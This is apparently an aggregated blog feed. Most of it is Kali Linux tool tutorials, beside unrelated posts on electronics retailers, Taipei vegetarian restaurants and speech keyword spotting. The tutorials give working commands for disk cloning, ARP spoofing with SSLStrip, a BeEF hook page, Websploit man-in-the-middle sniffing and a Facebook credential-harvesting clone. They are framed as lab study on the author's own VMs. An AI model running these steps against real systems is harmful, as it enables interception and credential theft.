“dc3dd is a patched version of GNU dd with added features for computer forensics” - from ForensicsWiki.

Comparison to GNU dd

While I was using dd, I found it’s hard to know how long will it take, and if the cloning was done completely without error. However, dc3dd fixes all these problems by providing:

  • on the fly hashing with multiple algorithms (MD5, SHA–1, SHA–256, and SHA–512)
  • progress reports
  • writing errors directly to a file

When and Why using dd or dc3dd

In the movies or TV series, we can see hackers plugin a USB disk then copy all the data out of the machine, and that’s the case we can use dd or dc3dd.

To be more specific, the flow is:

  • insert a Kali live usb disk into the target machine
  • do the Kali Forensics Boot
  • dd or dc3dd the disk of the target machine into a file on the Kali USB disk or another USB disk

Usage

I use VMs, so I won’t have the target machine in this example. However, you can pretend the disk I am going to clone (/dev/sda5) is the disk of the target machine. And, I am cloning the disk into a file stored in another USB disk.

First of all, list out the partitions of all the disks.

> fdisk -l

Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 40136703 40134656 19.1G 83 Linux
/dev/sda2 40138750 41940991 1802242 880M 5 Extended
/dev/sda5 40138752 41940991 1802240 880M 82 Linux swap / Solaris

Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d

Device Boot Start End Sectors Size Id Type
/dev/sdb1 976 7864319 7863344 3.8G b W95 FAT32

Pick the one you want to clone later, and here I am using the Linux swap (/dev/sda5), which is kind of meaningless but enough for practice purpose.

Then, locate the place you want to save your cloned disk image. Usually, you would want to use another USB disk since the machine may not belong to you, and what you want to do is to clone the disk, save in the USB disk, then take away. I will save the file on the /dev/sdb disk, which is mounted at /media/root/0909-B70D/disk-img/.

Start dc3dd:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
261455872 bytes ( 249 M ) copied ( 28% ), 33 s, 7.6 M/s

  • if: input disk location
  • of: output image location
  • hash: calculate the hash on the fly

Verification

After the cloning is completed, we can check if the file looks exactly the same as the original by comparing the hash code:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
922746880 bytes ( 880 M ) copied ( 100% ), 236 s, 3.7 M/s

input results for device `/dev/sda5':
1802240 sectors in
0 bad sectors replaced by zeros
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)

output results for file `/media/root/0909-B70D/disk-img/cloned':
1802240 sectors out

dc3dd completed at 2016-04-10 13:00:45 +0800

> file /media/root/0909-B70D/disk-img/cloned
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f /media/root/0909-B70D/disk-img/cloned

As you can see, the swap file is copied, and the hashs are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).

Kali Forensics Boot

By doing the Kali Forensics Boot, one can gain lots of benefits from being silent. That is, the Kali Forensics Boot provides following features:

  • the internal hard disk is never touched
  • auto-mounting of removable media is disabled

Reference

by Heron Yang (noreply@blogger.com) at April 10, 2016 05:45 AM

April 06, 2016

Kali Tool Series - SSLStrip

Refer to “How does SSLstrip work?” on StackExchange: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” https:// URLs and turning them into http:// URLs.
> sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

Overview

We will use ARP Spoofing in order to obtain the victim’s traffic, which means that the traffic will go through our Kali machine then pass back to the victim or the server he/she is communicating with. Then, we will be listening on port 80, the basic HTTP protocol port. All the traffic of port 80 will be routed to SSLStrip, and SSLStrip will handle rest of the HTTPS traffics.
The expected results was that the attacker will be able to read the requests between the victim and the HTTPS websites he/she is visiting, which may contains valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it’s seems that this method is out of date.

Find the Gateway IP

> route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 1024 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
192.168.63.2 0.0.0.0 255.255.255.255 UH 1024 0 0 eth0

or,
> netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
So, the Gateway IP is 192.168.63.2 in my case.

Find the Victim IP

As I run Kali in VM, I will let the victim be a Ubuntu server, which is also another VM on my machine. I run this on my Ubuntu:
> ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:4f:5f:5b
inet addr:192.168.63.152 Bcast:192.168.63.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:118 errors:0 dropped:0 overruns:0 frame:0
TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15530 (15.5 KB) TX bytes:14538 (14.5 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1184 (1.1 KB) TX bytes:1184 (1.1 KB)
That is, the victim IP is 192.168.63.152. If you have no access of the victim machine, you can use commands like nmap -sP 192.168.63.0/24 to search.

IP Routing

We are going to redirect Kali’s inbound traffic from 80 to the port SSLStrip is running on (let’s use 5050 here).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
To check if the routing rule is set:
> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
pkts bytes target prot opt in out source destination
16 960 REDIRECT tcp -- any any anywhere anywhere tcp dpt:http redir ports 5050

If you want to clean up some mess and reset, here’s the way to clear all PREROUTING rules:
for i in $( iptables -t nat --line-numbers -L | grep ^[0-9] | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING $i; done

IP Forwarding

Since we are going to issue ARP Spoofing later, we have to enable IP forwarding first. So, whenever the Kali machine recieves packages, it will send them to the proper destination. We call this MitM (Man in the Middle).
> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1

ARP Sproof

Now, in order to let the traffic flow through our Kali machine (Mitm), we need ARP Sproof. The syntax is:
> arpspoof -i interface -t target_IP -r gateway_IP
In our case:
> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c

The process is blocking, and we should keep it running.

SSLStrip

Start SSLStrip on port 5050 (or any port you like, just make sure that matches the one we used in IP Routing).
> sslstrip -l 5050

sslstrip 0.9 by Moxie Marlinspike running...

Victim Browse HTTPS Websites

Since my victim only has Command Line Interface, so I am using lynx as my browser.
> lynx http://www.paypal.com
On Kali’s Wireshark, we can tell that ARP Spoofing is working because all duplicated packages are shown. (In the screenshot, the upper part happened when ARP Spoofing was off, and all the traffics looks normal. The lower part happened when ARP Spoofing was on, we can see that Kali recieved all the traffic to/from victim, 192.168.63.152, then passed through.)


SSLStrip Result

SSLStrip crashed right after the user is about to connect the HTTPS website. I’ve tried to get the latest SSLStrip 0.9.2, but it crashes in the same way. And, I also found the other users are suffering from this issue as well: sslstrip on non hsts site error #17 and Execptions in twisted #15.
There’s the error:
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "sslstrip.py", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.connectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
self._commonConnection.connectionLost(self, reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
self.handleResponseEnd()
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
self.handleResponse(b)
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
self.client.write(data)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
The experiment didn’t work, and I may come back to this if I found something new.

Reference

by Heron Yang (noreply@blogger.com) at April 06, 2016 07:55 AM

DoS v.s. DDoS

People like to mix up DoS with DDos, which are similiar but different. By refering to Wikipedia, we got:

DoS: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

DDoS: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.

Difference

DoS is launched by one machine; on the contrast, DDoS is launched by distributed machines.

Refer to DDoS attack - Distributed Denial of Service, we got: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”

Who Mixed Them Up?

I’ve been seeing this mistake for a long time, people keep mixing up these two names. If the attack was only launched on one machine, then it’s called DoS instead of DDoS. Some examples of people who got it wrong here:

Why This Matters?

DoS is easy to launch, and easy to be defended. On the other hand, DDoS is always a big threat in current world since victims have a difficult time distinguishing the bad guys from the large amount of users. DDoS is a serious problem that we should be focus on (see Digital Attack Map hosted by Google); and those who claim what they were doing were DDoS attacks but actually DoS attacks should stop delivering wrong information to the public.

How To Launch DDoS Then?

Too bad, I’ve never launched a DDoS attack before, which I believe it’s illegal as well. However, followings are the information about it if you’re interested in knowing more. And, one should NOT apply them on real machines/networks unless he/she fully understand the consequences.

First of all, you need a BotNet, or a distributed machines under your control. Bad guys buy the BotNet on Black Market. Those machines are usually the ones had been hacked, so attackers can control them via the backdoor left on the machine.

Then, the attacker will ask all the bot machines send requests to the victim. The requests will be in a high frequency, and make the victim couldn’t handle all of them (run out of memory or CPU), eventually the service freezed. UFONet is one tool I found online that is designed to test/launch DDoS attacks written in Python.

by Heron Yang (noreply@blogger.com) at April 06, 2016 05:14 AM

April 04, 2016

Keyword Spotting for Controlling Window Background Color

This is a small testing program that uses both CMUSphinx and GTK+ to demonstrate keyword spotting (KWS) algorithm.

KWS is the technique used to detect the keyword at anytime. Yes, this is the technique applied for “Okay, Google” and “Hey, Siri”. Whenever the keyword is heard by the machine, some callback function will be fired up.

History

  • Originally, Hidden Markov Model system
  • Google, 2014, Deep Neural Network (DNN), demos outperformance to HMM system
  • Google, 2015, Convolutional Neural Networks (CNNs), demos outperformance to DNN
    • ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network
    • not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles / capture translational invariance with far fewer parameters by averaging the outputs of hidden units

Tools

CMU Sphinx Project by Carnegie Mellon University

  • CMU LTI, Language Technology Institute
  • Designed to be adopted on different platforms including iOS, Android, Raspberry Pi, etc.
  • License: BSD-style (nice!)

Raspberry Pi 2 – Speech Recognition on device

  • Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html
  • Link .lm and .dict file, command: pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000

My Code

Github link: https://github.com/heronyang/kws-color-demo

Components

In main.c, the program fires up a thread for handling GUI jobs right after it started. Then, it started to setup pocketsphinx and call recognize_from_microphone or recognize_from_file for the audio input. Since argc/argv is passed into the settings, the user can specify the dictionary file or log file as what is written in run.sh.

Run

> ./run.sh

Demo


by Heron Yang (noreply@blogger.com) at April 04, 2016 09:16 AM

April 01, 2016

Kali Tool Series - BeEF

“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”

How It Works

Basically, first start the BeEF server, then let the victim run hook.js on his/her browser, and we can know information of victims’ machines or control them.

Start BeEF Server

> beef-xss 
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

Then, open the browser with URL http://127.0.0.1:3000/ui/panel on Kali, and you’ll see the BeEF Control Panel.

Let Victim Run hook.js

I’m not including the strategies of letting people to run hook.js in real world, which I believe some social engineering is involved. Instead, I am running a simple server on Kali using another port other than 3000 (used by BeEF Server), then let the victim open the webpage which has hook.js embedded.

Setup the Web Page
Usually, some frauding may be involved here, but I am ignoring them for study purpose. What I built now is barely a blank page with label “hello”. Save following page as index.html somewhere on Kali.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<h1>hello</h1>
<script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
192.168.63.155 is the IP of Kali, which is a local IP, so only other machines under the same local network can access later on.

Setup the Web Server
I am using Python Simple HTTP Server, so:
> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
And, the web server will start and be listening to port 8000.

Victim Visit
As Kali is running in a VM, I visit the site just set on my host machine (Mac). Simply opening http://192.168.63.155:8000 will work.

Control the Victim

On Kali, you can see a new item popped up on the lefthand list. You can start to read the victim’s information or control it.

What You Can Do

On the command tab in the BeEF Control Panel, you can see a list of action you can do to the victim. Well, in my experiment, quite a lot of them don’t work, possibly because the browsers had fixed the security flaw, or just because the BeEF code wasn’t update to date.
On BeEF Cantrol Panel, different color circle next to the actions represent different status:
  • green : works on the target; invisible.
  • orange : works on the target; visible.
  • grey : must yet be verified if it works.
  • red : does not work on the target.
Here, I will list some actions I found working.

Play Sound

This command is to play a sound on the target machine by giving the sound URL. I randomly searched on www.findsounds.com, and got this link:
http://princezze.free.fr/sounds/laugh.MP3
Put it onto the panel, then it works.


iFrame Event Logger

This one allows the attacker to open website by providing the URL. It won’t work on the sites that check its origin. That is, if you try to open Google.com, then you will get following error in the victim’s browser console.
[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
But, it’s fine if you open other simple websites like http://www.heron.me/.



Excute JavaScript Code

This is the point. As the attack was trigger by the user when he/she runs hook.js, all the further actions are done by passing JavaScripts code from the attackers to the victim. So, “excuting JavaScript code” on the attacker’s demand will bring the maximun flexiblilty.




Other

Some commands don’t show the result on the control panel, or they are showed in somewhere I couldn’t find. So, I switched to my favorite Terminal, and found the results.
They are saved in a sqlite .db file, by using the sqlite tool, we can access the result:
> cd /var/lib/beef-xss
> sqlitebrowser beef.db
Check the core_results table for the results.


Reference

by Heron Yang (noreply@blogger.com) at April 01, 2016 08:47 AM

March 30, 2016

Electronics Retailers

Large Online Retailers

← Older revision Revision as of 16:47, 30 March 2016
Line 8: Line 8:
 
* [http://www.mouser.com/ Mouser]
 
* [http://www.mouser.com/ Mouser]
 
* [http://twen.rs-online.com/web/ RS-Online]
 
* [http://twen.rs-online.com/web/ RS-Online]
 +
* [http://www.onlinecomponents.com/ Online Components]
  
 
== Taiwanese Online Retailers ==
 
== Taiwanese Online Retailers ==

by Zeejack.tech at March 30, 2016 04:47 PM

User:Zeejack.tech

User account Zeejack.tech was created

by Zeejack.tech at March 30, 2016 04:44 PM


Heron's Notes

Kali Tool Series - Websploit

Although it seems that there are other more handly tools for web exploits other than Websploit, it still interests me by having a similiar inferface as Metasploit.

To Start

> websploit

__ __ ___ ____ _____ ____ _ ___ ____ ______
| |__| | / _]| \ / ___/| \| | / \| || |
| | | | / [_ | o )( \_ | o ) | | || | | |
| | | || _]| | \__ || _/| |___ | O || | |_| |_|
| ` ' || [_ | O | / \ || | | || || | | |
\ / | || | \ || | | || || | | |
\_/\_/ |_____||_____| \___||__| |_____| \___/|____| |__|


--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules Description
------------------- ---------------------
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
web/cloudflare_resolver CloudFlare Resolver


Network Modules Description
------------------- ---------------------
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/arp_poisoner Arp Poisoner


Exploit Modules Description
------------------- ---------------------
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules Description
------------------- ---------------------
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack
wifi/wifi_honeypot Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.

Scan Directories

We are scanning the directories under the target machine using HTTP requests with bruteforce. As far as I know, DirBuster is also famous for doing this job. And, by doing this action, it’s easy for the target machine to be noticed since lots of invalid requests will be sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options Value
--------- --------------
TARGET http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET => 192.168.63.156

wsf > run

However, I don’t think the program does a good job as it doesn’t print out the result in the same time, the user might have to wait util it’s completed. And, it usually takes a long time.

Man in the Middle

Man in the Middle is an interesting attack. The attacker stay silent and steal the network traffic from the victim, then pass it over. That is, the victim may not notice that his/her traffic is totally monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options Value RQ Description
--------- -------------- ---- --------------
Interface eth0 yes Network Interface Name
ROUTER 192.168.1.1 yes Router IP Address
TARGET 192.168.1.2 yes Target IP Address
SNIFFER driftnet yes Sniffer Name (Select From Sniffer List)
SSL true yes SSLStrip, For SSL Hijacking(true or false)


Sniffers Description
------------ --------------
dsniff Sniff All Passwords
msgsnarf Sniff All Text Of Victim Messengers
urlsnarf Sniff Victim Links
driftnet Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET => 192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER => 192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER => urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then, the victim start to browse the Internet. I’m letting the victim run wget google.com to simulate Internet surfing.

Back to the attacker, here’s that he/she recieved:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"

Reference

by Heron Yang (noreply@blogger.com) at March 30, 2016 09:46 AM

March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool built into Kali developed by Paterva, which is a powerful information gathering tool that deals with Internet infrastructures to personal information and social networks.

Palette

Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. For each object type, it means an item in real world, and obtains relavant attributes. By running tranform actions, we can expand one object to the whole network of interest.
In Maltego, we got following types in Palette:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego at Application menu → Information Gathering → Maltego (or, just type maltego in Terminal), then register an account, select transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything that mentioned above in the Palette.
Step 3 - Expand
Right click on the object, then perform “transform” action, which will expand the graph by providing more connection to other objects.

Example Output


Gather information starts from my domain, heron.me.


Gather information starts from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.

Reference

by Heron Yang (noreply@blogger.com) at March 29, 2016 09:36 AM

March 27, 2016

March 26, 2016

台北素食聚餐選項

每次和朋友聚餐得重找一次連結寄出去, 乾脆寫在這裡, 以後丟這篇文章的連結就好。

注意: 餐廳的餐點不是全部純素: 有蛋奶素、五辛素、純素。用餐前記得依個人需求詢問。

需一到兩週前預約

  • (港式飲茶) 養心茶樓: 官網, 食記。近松江南京站。
  • (西式+中式 buffet) 果然匯: 官網, 食記。近忠孝敦化站。
  • (義式) Miacucina: 食記。有多家分店, 其中兩家近捷運忠孝復興站和西湖站。
  • (西式套餐) 舒果新米蘭蔬食: 官網, 食記。有多家分店, 其中幾家近台大醫院站、古亭站、松江南京站。

不用預約 (超過四人可能需要)

  • (日式烏龍麵) 穗科手打烏龍麵: 官網, 食記。有兩家, 分別近中山國中站和忠孝敦化站。
  • (中式合菜) 祥和蔬食精緻料理: 食記。近善導寺站。
  • (火鍋、串烤、其它) 愛家光復店: 官網, 食記
  • (泰式合菜) 京品泰味素食: 官網, 食記。搭公車最近, 離忠孝新生站、東門站有段距離。

備註

  • 我自己一個人偶而會去穗科或愛家光復店吃晚餐, 可以慢慢地用餐, 看看書或滑手機, 滿不錯的。
  • 其它沒列在上面也不錯的餐廳 (沒列只是離台北市中心有點遠或是我懶得打字了...): 長春素食、寬心園、陽明春天、浣花草堂、TRIO義式庭園蔬食、頤園素食小館 。
  • 聽說不錯但還沒吃過的: 京兆尹、鈺善閣。
  • 新竹的綠舍奇蹟相當不錯。

by fcamel (noreply@blogger.com) at March 26, 2016 05:20 AM

March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social Engineering” is a sub-field of network security. It’s much more un-related to the technical things, but frauding people around in order to hack into an unauthorized system.

The content here is only for studying purpose, one SHOULD NOT deploy in real world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t fraud people.

Build a Fishing Website

The basic example, we are building a fake login website for people to put username and password.
> setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1
Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

99) Return back to the main menu.

set> 2

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu

set:webattack> 3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then, it will ask the IP of your Kali machine, which can be accessed by ifconfig command. Mine is 192.168.63.155 here.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now, you’re all set. By default, the files are generated at /var/www/. However, we have to put them into /var/www/html/, which is the default folder of apache.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the url (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.



Finally, you will get the username and password in harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
[lsd] => AVqaOX85
[display] =>
[enable_profile_selector] =>
[isprivate] =>
[legacy_return] => 1
[profile_selector_ids] =>
[skip_api_login] =>
[signed_next] =>
[trynum] => 1
[timezone] => -825
[lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
[lgnrnd] => 194144_MLVw
[lgnjs] => 1458894004
[email] => apple
[pass] => banana
[login] => 1
[default_persistent] => 0
[qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)

by Heron Yang (noreply@blogger.com) at March 25, 2016 08:39 AM

March 19, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security proessionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth to know that a successful service exploitation requires following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before started, it’s better to briefly understand the modules in it, which can be roughly grouped into followings (reference is here):

Auxiliary modules
